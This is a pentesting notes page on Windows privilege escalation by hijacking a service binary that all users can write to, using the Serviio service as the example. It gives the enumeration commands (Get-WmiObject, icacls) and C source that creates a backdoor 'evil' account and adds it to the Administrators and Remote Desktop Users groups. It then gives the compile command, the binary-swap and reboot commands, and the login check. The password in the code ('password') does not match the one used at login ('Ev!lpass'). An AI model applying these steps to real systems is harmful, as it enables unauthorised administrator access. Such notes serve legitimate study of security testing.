Binary hijacking / Insecure file permissions
Binary hijacking / Insecure File permissions
Another way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system. Example: Serviio service
Check running service in cmd and then look for any suspicious one Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} C:\Program Files\Serviio\bin\ServiioService.exe look suspicious
Check permission on suspicious service with icacls window utility in cmd F Full access , M Modify access , RX Read and execute access , W Write-only access icacls "C:\Program Files\Serviio\bin\ServiioService.exe” It give output with BUILTIN\Users:(I)(F) means any user has full access
C code that will create evil user and add it in local Administrator group
<aside> 👨💻 #include <stdlib.h>
int main () { int i;
i = system ("net user evil password /add"); i = system ("net localgroup administrators evil /add");
i = system ("net localgroup 'Remote Desktop Users' evil /add");
return 0; }
</aside>
Compile adduser.c in linux i686-w64-mingw32-gcc adduser.c -o adduser.exe
replace the original ServiioService.exe binary with our malicious copy: move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe”
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe”
dir "C:\Program Files\Serviio\bin\”
Restart the service net stop Serviio But most of the time current user don’t have permission to restart service . But service may be set to “Auto” restart after system reboot. To check the same wmic service where caption="Serviio" get name, caption, state, startmode
Check if current user has permission to reboot whoami /priv
Reboot shutdown /r /t 0
Now login with “evil” “Ev!lpass” and check evil user in local Administrator group net localgroup Administrators
Last updated